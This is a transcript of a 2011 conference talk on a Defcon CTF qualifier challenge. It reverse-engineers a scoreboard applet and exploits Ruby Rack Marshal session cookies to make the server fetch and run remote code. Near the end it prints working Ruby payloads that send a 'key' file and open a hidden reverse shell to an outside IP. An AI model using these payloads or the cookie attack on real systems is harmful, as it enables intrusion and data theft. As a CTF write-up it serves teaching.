Defcon CTF quals

30
Defcon CTF quals

description

Talk on Defcon CTF quals done at Ruxmon in June 2011

Transcript of Defcon CTF quals

Page 1: Defcon CTF quals

Defcon CTF quals

Page 2: Defcon CTF quals

Agenda

● Defcon CTF ● Defcon Quals 2011 ● The Score Board● Powtent Pownable 300

Page 3: Defcon CTF quals

Defcon CTF

● One of the most prestigious CTF● Qualification to get in● Only 10 teams are qualified● Run by ddtek

Page 4: Defcon CTF quals

Defcon CTF

● You get a FreeBSD box with X services:● Reverse each service● Protect each service● Attack others' service

Page 5: Defcon CTF quals

Defcon CTF

● You get points for: ● Availability● Reading other teams' keys● Overwriting other teams' keys

(DEFACED)

Page 6: Defcon CTF quals
Page 7: Defcon CTF quals

Defcon CTF quals

● Dates:● From 03 Jun 2011 19:00:00 UTC● To 06 Jun 2011 00:00:00 UTC

● 53 non-stop hours

Page 8: Defcon CTF quals

Defcon CTF quals

● 5 categories● 5 challenges per category● Challenges are progressively

opened

Page 9: Defcon CTF quals

FIXME picture of score board

Page 10: Defcon CTF quals

The Score Board

● Java applet● Annoying and slow● The organisation is late● Direct openssl connection

doesn't seem to work

Page 11: Defcon CTF quals

The Score Board

● Let start reversing with jad● Class to communicate with the

server: biz/ddtek/quals/QualsClient.class

● Need to do some patching to remove UI related instructions

Page 12: Defcon CTF quals

The Score Board

● Method to login● Method to get the matrix of

challenges as an array● Method to get the details for each

challenge

Page 13: Defcon CTF quals

The Score Board

● Build 2 java apps to get score and to get new challenge

● Build an IRC alert bot for new challenge

● Fuzz/Try to inject ;)● And share it with the team

Page 14: Defcon CTF quals
Page 15: Defcon CTF quals

Powtent Pownables 300

● Ruby based ● HTTP based:

● Often the case ● No XSS or SQLi● Just vulnerable and weird web

servers

Page 16: Defcon CTF quals

PP300: 2 paths ???

● The version of Webrick seems vulnerable:

WEBrick/1.3.1 (Ruby/1.8.7/2010-08-16)

● The cookie sent is identical between 2 HTTP requests without cookies...

Page 17: Defcon CTF quals

Set-Cookie: rack.session=BAh7CSIlZU5wajRZam1VVEpUSUJiRTYraXE2cXZXY0NsWkVLdGMiAYhlTnBq%0ANFlqbVVUSlRJQmJFNitpcTZxdldjQ2xaRUt0Y0hVVEg2T3VyeGhDakNhWUJy%0ARWxWdjBhVnNDWjlJTlFFNndWcTFnWHlpYkVwSmo1ZUgyU1hxb2FxZ29LMWdv%0AS3FKdEFtWW9OQk5VWlZCMHh4S1prUUhYTHF1cnFxNmx3QWRoODBBZz09IiVl%0ATnFWbEQxdXd6QU1oWmNPUlE1UkVGbHFGMUE0QnVqUSIC8AFlTnFWbEQxdXd6%0AQU1oWmNPUlE1UkVGbHFGMUE0QnVqUUpjY29BZHFENGRGRE1tUWdmUFpLbEtp%0AZjJFRVJEN1lsOFluaysyUy92ZjkrSE05Zk1NTUNJOXpnQ2hQYzRkL3g0WGll%0ANGJWcjlwb0ZVTitwV1dsR1dNOHNYak5LR3NnemtUU1AwV3R1Rmp1Y0dwRnMz%0AcjcxZnZPYTZ3QzdpZktJMmtLdVhqUGxNaVIxcGcwUWhXbm5tSUdvVGpSNXpU%0AM1hUa0hDenExcnliWUdsYVFJVFhRL0JENUZ4RzdkczNkMVRGbVQrUkMzWnZI%0ASnBldkVlbWxUVXZoVTRSUWpFSUhCUC8yOTQ0NzVKNjVMNWxNQjhXNWZRbXdQ%0ARU1WUm9pSkpiSldQZVVXNmoycTRSOXRJSmFwaExIek1YdFNhTHhyVEZ5UmRs%0AS2ovaFk5WjBvWG1rOFlhODdHK042ek9aT0pqN1ZHb0lEaElTUkx0NkppeDVE%0AVStrS2lSMVRVRW0vVWNmRDRlcU14SE1xS0loOWxRWVQyTlB0RDR0S2N6Rmkr%0AMk1iV0pqTS9PaWNhQ2pabzE0eU4xRHR4OFBZM0krTWlqUk8xQTR1Ull0YWNr%0AUHZMWVM0N2JmdmVTK01qVEwzcEhFL204K24vN0ErYksrK0k9IiVtaDdjSiVo%0AOTlMUG4xelNvaDQsNDIhNmUzdDc4Q3ddaSIyZU5wajRWQ1N5U2dwS2JEUzF6%0AYzBNdGN6QUVKREsxTWpDd05EZlFCUi9RWEIKIiVlTnFGME0wS3dqQU1BT0NM%0AQjluWkJ3alpwQjFzeTkydCICBAFlTnFGME0wS3dqQU1BT0NMQjluWkJ3alpw%0AQjFzeTkydDBLTlA0TVZLNmhQc0JmTHdwdG9PTjVpbXRCVHk5U2M1SE84bmJH%0AQTNtTWhXZU43TnozUFErQ1VtSHY0SUNNeUVQd1VSeDJFUm5SOTl0d1lpQk8y%0AamlGR0JoZURIWlhTc2dFQ0tvQ2RFSDFoeTJuS0t3Y0FpS0MydHYyUkE3MTB0%0AaUZoRTdIczBzVHp3dVNrNkYvUlk5ZDNTUkVLZVBxYXZwa2VhOWU5QlVoOENX%0AR0FXdWNxbUd4bFFxaUU0aDdWeEc2RXBtNEZ5NWh0djd6QUd0VDVkdE5KcFN2%0AVzIxUXRTcVY1dg%3D%3D%0A

Page 18: Defcon CTF quals

PP300: rack cookies

● Base64 encoding of Marshall objects

● Marshall =~ Serialization

z= Marshal.load(Base64.decode64(URI.decode(cookie)))

Page 19: Defcon CTF quals

z= Marshal.load(Base64.decode64(URI.decode(cookie)))

> pp z{ "eNpj4YjmUTJTIBbE6+iq6qvWcClZEKtc" =>"eNpj4YjmUTJTIBbE6+iq6qvWcClZEKtcHUTH6OurxhCjCaYBrElVv0aVsCZ9INQE6wVq1gXyibEPjj5eH2SXqoaqgoK1goKqJtAmYoNBNUZVB0xxKZkQHXLqurqq6lwAdh80Ag==",

"eNqVlD1uwzAMhZcORQ5REFlqF1A4BujQ" => "eNqVlD1uwzAMhZcORQ5REFlqF1A4BujQJccoAdqD4dFDMmQgfPZKlKif=",

"mh7cJ%h99LPn1zSoh4,42!6e3t78Cw]i" => "eNpj4VCSySgpKbDS1zc0MtczAEJDK1MjCwNDfQBR/QXB\n",

"eNqF0M0KwjAMAOCLB9nZBwjZpB1sy92t" => "eNqF0M0KwjAMAOCLB9nZBwjZpB1sy92t0KNP4MVK6hPsBfLwptOON5imtBTY9Sc5HO8nbGA3mMhWeN7Nz3PQ+CUmHv4ICMyEPwURx2ERnR99twYiBO2JiFGBheDHZXSsgECKoCdEH1hy2nKKwcAiKC2tv2RA710tiFhE7Hs0sTzwuSk6F/RY9d3SREKePQavpkea9e9BUh8CWGAWucqmGxlQqiE4h7VxG6Epm4Fy5htv7zAGtT5dtNJpSvW21QtSqV5v"}

> z= Marshal.load(Base64.decode64(URI.decode(cookie))) > pp z.class Hash

Page 20: Defcon CTF quals

z= Marshal.load(Base64.decode64(URI.decode(cookie)))

{ "eNpj4YjmUTJTIBbE6+iq6qvWcClZEKtc" =>"eNpj4YjmUTJTIBbE6+iq6qvWcClZEKtcHUTH6OurxhCjCaYBrElVv0aVsCZ9INQE6wVq1gXyibEPjj5eH2SXqoaqgoK1goKqJtAmYoNBNUZVB0xxKZkQHXLqurqq6lwAdh80Ag==",

"eNqVlD1uwzAMhZcORQ5REFlqF1A4BujQ" => "eNqVlD1uwzAMhZcORQ5REFlqF1A4BujQJccoAdqD4dFDMmQgfPZKlKif=",

"mh7cJ%h99LPn1zSoh4,42!6e3t78Cw]i" => "eNpj4VCSySgpKbDS1zc0MtczAEJDK1MjCwNDfQBR/QXB\n",

"eNqF0M0KwjAMAOCLB9nZBwjZpB1sy92t" => "eNqF0M0KwjAMAOCLB9nZBwjZpB1sy92t0KNP4MVK6hPsBfLwptOON5imtBTY9Sc5HO8nbGA3mMhWeN7Nz3PQ+CUmHv4ICMyEPwURx2ERnR99twYiBO2JiFGBheDHZXSsgECKoCdEH1hy2nKKwcAiKC2tv2RA710tiFhE7Hs0sTzwuSk6F/RY9d3SREKePQavpkea9e9BUh8CWGAWucqmGxlQqiE4h7VxG6Epm4Fy5htv7zAGtT5dtNJpSvW21QtSqV5v"}

How to lose an hour :/

{ "eNpj4YjmUTJTIBbE6+iq6qvWcClZEKtc" =>"eNpj4YjmUTJTIBbE6+iq6qvWcClZEKtcHUTH6OurxhCjCaYBrElVv0aVsCZ9INQE6wVq1gXyibEPjj5eH2SXqoaqgoK1goKqJtAmYoNBNUZVB0xxKZkQHXLqurqq6lwAdh80Ag==",

"eNqVlD1uwzAMhZcORQ5REFlqF1A4BujQ" => "eNqVlD1uwzAMhZcORQ5REFlqF1A4BujQJccoAdqD4dFDMmQgfPZKlKif=",

"mh7cJ%h99LPn1zSoh4,42!6e3t78Cw]i" => "eNpj4VCSySgpKbDS1zc0MtczAEJDK1MjCwNDfQBR/QXB\n",

"eNqF0M0KwjAMAOCLB9nZBwjZpB1sy92t" => "eNqF0M0KwjAMAOCLB9nZBwjZpB1sy92t0KNP4MVK6hPsBfLwptOON5imtBTY9Sc5HO8nbGA3mMhWeN7Nz3PQ+CUmHv4ICMyEPwURx2ERnR99twYiBO2JiFGBheDHZXSsgECKoCdEH1hy2nKKwcAiKC2tv2RA710tiFhE7Hs0sTzwuSk6F/RY9d3SREKePQavpkea9e9BUh8CWGAWucqmGxlQqiE4h7VxG6Epm4Fy5htv7zAGtT5dtNJpSvW21QtSqV5v"}

Page 21: Defcon CTF quals

All values start with eN...

> s="eNpj4YjmUTJTIBbE6+iq6qvWcClZEKtcHUTH6OurxhCjCaYBrElVv0aVsCZ9INQE6WVq1gXyibEPjj5eH2SXqoaQgoK1goKqJtAmYoNBNUZVB0xxKZkQHXLqurqq6lwAdh80Ag==" > Base64.decode64(s).each_byte do |c|> print "\\x%02x" % c> end

\x78\xda\x63\xe1\x88\xe6\x51\x32\x53\x20\x16\xc4\xeb\xe8\xaa\xea\xab\xd6\x70\x29\x59\x10\xab\x5c\x1d\x44\xc7\xe8\xeb\xab\xc6\x10\xa3\x09\xa6\x01\xac\x49\x55\xbf\x46\x95\xb0\x26\x7d\x20\xd4\x04\xe9\x6b\xea\xd6\x05\xf2\x89\xb1\x0f\x8e\x3e\x5e\x1f\x64\x97\xaa\x86\xaa\x82\x82\xb5\x82\x82\xaa\x26\xd0\x26\x62\x83\x41\x35\x46\x55\x07\x4c\x71\x29\x99\x10\x1d\x72\xea\xba\xba\xaa\xea\x5c\x00\x76\x1f\x34\x02

… googling for “\x78\xda” links to the zlib

Page 22: Defcon CTF quals

After few lines of code

z.each do |p,v| puts puts Marshal.load(Zlib::Inflate.new.inflate(Base64.decode64(v)))end

And you get...

Page 23: Defcon CTF quals
Page 24: Defcon CTF quals

[ … ]

[ … ]

http://127.0.0.1:52801/

_//( oo\\\\ <_.\\\ \__/" //_`. ,@;@, ||/ )] ;@;@( \@;@;@;@;@;@,_|/ / | /a `@\_|@;@;@;@(_____.' | / )@:@;@;@;@/@:@;@#|"""| `--"'`;@;@;@;@|@;@;@`==\ ) `;@;\;@;\;@;@` || | || | \\ ( __||H| || | // / \=="#'= // ( // / |__V_| ''"' '"'___<<____)

If you follow, there were 4 values... … I removed the goatse...

Page 25: Defcon CTF quals

We need to retrieve a file named “key”...

inte = "mh7cJ%h99LPn1zSoh4,42!6e3t78Cw]i"url = Marshal.load(Zlib::Inflate.new.inflate( Base64.decode64(z[inte])))pp urlurl += "key"

zzzz = Zlib::Deflate.new(Zlib::BEST_COMPRESSION) dst = Base64.encode64(zzzz.deflate(Marshal.dump(url), Zlib::FINISH))zzzz.closez[inte] = dstl = TCPSocket.new( "pwn508.ddtek.biz",52719)s = "#{URI.encode(Base64.encode64(Marshal.dump(z)))}"lol = "GET / HTTP/1.0\r\nCookie: rack.session=#{s}\r\n\r\n"puts loll.write lolputs l.read

And we get...

Page 26: Defcon CTF quals

NOTHING!!!

Page 27: Defcon CTF quals

So we need...

● A web server that responds with a Zlib compressed response that is base64 encoded

● This response should declare a function that will read a file or spawn a shell

Page 28: Defcon CTF quals

Request with crafted cookie

Retrieve code to exec

Send key or reverse shell

Page 29: Defcon CTF quals

Building the answer: read a filea = "proc { require 'socket';

TCPSocket.new(\"95.142.164.253\",1235).write(File.read(\"key\")) }"

zzzz = Zlib::Deflate.new(Zlib::BEST_COMPRESSION)dst = Base64.encode64(zzzz.deflate(a, Zlib::FINISH))zzzz.closeputs "HTTP/1.1 200 OK\r\nContent-length: "+dst.size.to_s+"\r\n\r\n"puts dst

a = "proc { require 'socket';$0=\"ps\";s = Socket.new(Socket::AF_INET,Socket::SOCK_STREAM,

Socket::IPPROTO_TCP);s.connect(Socket.pack_sockaddr_in(1235, '95.142.164.253'));[$stdin, $stdout, $stderr].each {|c| c.reopen s};system(\"export HISTFILE=/dev/null && /bin/sh -i\");[$stdin, $stdout, $stderr].each {|c| c.close}; }"

Payload for a shell:

Page 30: Defcon CTF quals

Conclusion...

● Good fun

● Challenging


FOX GROUP · 2021. 3. 22. · Nasce DEFCON 5. DEFCON 5 is born. DEFCON 5 diventa fornitore ufficiale NATO. DEFCON 5 becomes official NATO dealer. Fondazione di Euroknives: produzione

FOX GROUP · 2021. 3. 22. · Nasce DEFCON 5. DEFCON 5 is born. DEFCON 5 diventa fornitore ufficiale NATO. DEFCON 5 becomes official NATO dealer. Fondazione di Euroknives: produzione

FEAL - CSAW CTF 2014 Quals Crypto300

FEAL - CSAW CTF 2014 Quals Crypto300

defcon catalog

defcon catalog

DEFCON CTF 予選参加レポート - ntt.com · 3 NTT Communications Corporation 1-1-6 Uchisaiwai-cho, Chiyoda-ku, Tokyo 100-8019, Japan 1 概要 毎年夏に開催される世界最大のセキュリティコンテスト「DEFCON

DEFCON CTF 予選参加レポート - ntt.com · 3 NTT Communications Corporation 1-1-6 Uchisaiwai-cho, Chiyoda-ku, Tokyo 100-8019, Japan 1 概要 毎年夏に開催される世界最大のセキュリティコンテスト「DEFCON

2011 Defcon

2011 Defcon

Seccubus - Defcon

Seccubus - Defcon

Defcon Indice2014

Defcon Indice2014

[2009 CodeEngn Conference 03] hkpco - DEFCON CTF 2009 Binary Leetness 100-500 Solutions

[2009 CodeEngn Conference 03] hkpco - DEFCON CTF 2009 Binary Leetness 100-500 Solutions

CTF-200 and CTF-200EXT Cable Tray Feeders

CTF-200 and CTF-200EXT Cable Tray Feeders

Defcon 16 Perry

Defcon 16 Perry

Malicious Proxies - Defcon

Malicious Proxies - Defcon

CTF Defcon 2007...la película Hackers. La frase es; Hack the planet. • Prueba 2 (200 puntos): ¿Qué OS uso Kenshoto para el CTF del 2006? Kenshoto es el grupo que organiza el concurso

CTF Defcon 2007...la película Hackers. La frase es; Hack the planet. • Prueba 2 (200 puntos): ¿Qué OS uso Kenshoto para el CTF del 2006? Kenshoto es el grupo que organiza el concurso

Defcon Docsis

Defcon Docsis

- 4.5 MB - Defcon

- 4.5 MB - Defcon

Engineering Capture the Flag Results J. · The “Defcon 18 Social Engineering CTF ‐ How Strong Is Your Schmooze” will be remembered ... Contestants were allowed 25 minutes to

Engineering Capture the Flag Results J. · The “Defcon 18 Social Engineering CTF ‐ How Strong Is Your Schmooze” will be remembered ... Contestants were allowed 25 minutes to

Defcon - Manual

Defcon - Manual

Blackjacking - Defcon 14

Blackjacking - Defcon 14

Cyber Grand Challenge及DEFCON 24 CTF决赛介绍

Cyber Grand Challenge及DEFCON 24 CTF决赛介绍

Rise of the Machines: Cyber Grand Challenge及DEFCON 24 CTF决赛介绍maskray.me/static/2016-09-24-cgc-defcon-ctf-presentation/slide.pdf · Rise of the Machines: Cyber Grand Challenge

Rise of the Machines: Cyber Grand Challenge及DEFCON 24 CTF决赛介绍maskray.me/static/2016-09-24-cgc-defcon-ctf-presentation/slide.pdf · Rise of the Machines: Cyber Grand Challenge

Defcon 20 CTF资格赛回顾 - paper.seebug.org Conf/KCon... · Defcon CTF 2 o 全球最有影响力的黑客竞赛 – “黑客奥运会” 1996年开始,已成功举办16届

Defcon 20 CTF资格赛回顾 - paper.seebug.org Conf/KCon... · Defcon CTF 2 o 全球最有影响力的黑客竞赛 – “黑客奥运会” 1996年开始,已成功举办16届